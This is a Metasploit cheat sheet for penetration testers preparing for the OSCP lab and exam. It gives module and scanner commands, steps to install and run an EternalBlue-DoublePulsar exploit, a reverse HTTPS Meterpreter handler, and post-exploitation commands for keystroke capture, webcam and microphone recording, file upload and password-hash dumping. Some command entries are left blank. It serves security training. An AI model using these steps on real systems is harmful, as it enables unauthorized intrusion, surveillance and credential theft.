Title: The Metasploit Framework techniques used and required in Penetration Testing
Author: unknowndevice64

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


Metasploit requires PostgreSQL

systemctl start postgresql

To enable PostgreSQL on startup

systemctl enable postgresql

MSF Syntax

Start Metasploit


msfconsole -q

Show help for command

show -h

Show Auxiliary modules

show auxiliary

Use a module

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module


Show the configuration parameters for a module

show options

Set options for a module

set THREADS 10

Run the module


Execute an Exploit


Search for a module

search type:auxiliary login

Metasploit Database Access

Show all hosts discovered in the MSF database


Scan for hosts and store them in the MSF database


Search machines for specific ports in MSF database

services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts)

services -p 445 --rhosts

Staged and Non-staged

Non-staged payload - a payload that is sent in its entirety in one go

Staged payload - a payload that is sent in two parts, used when there is not enough buffer space or when you need to bypass antivirus

MS17-010 - EternalBlue
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built-in Metasploit EternalBlue module. I found that the elevenpaths version works much more reliably. Here are the instructions to install it, taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI

The first step is to configure Kali to work with 32-bit Wine

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

Download the exploit repository https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb or ~/.msf4/modules/exploits/windows/smb

Start the Metasploit console

I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run

Experimenting with Meterpreter

Get system information from Meterpreter Shell


Get user id from Meterpreter Shell


Search for a file

search -f *pass*.txt

Upload a file

upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file

download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell


Exit the meterpreter shell


Metasploit Exploit Multi Handler

multi/handler to accept an incoming reverse_https_meterpreter

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
[*] Started HTTPS reverse handler on https://$ip:443/

Building Your Own MSF Module

mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)

download - Download a file or directory
upload - Upload a file or directory
portfwd - Forward a local port to a remote service
route - View and modify the routing table
keyscan_start - Start capturing keystrokes
keyscan_stop - Stop capturing keystrokes
screenshot - Grab a screenshot of the interactive desktop
record_mic - Record audio from the default microphone for X seconds
webcam_snap - Take a snapshot from the specified webcam
getsystem - Attempt to elevate your privilege to that of local system.
hashdump - Dumps the contents of the SAM database

Meterpreter Post Exploitation Features
Create a Meterpreter background session

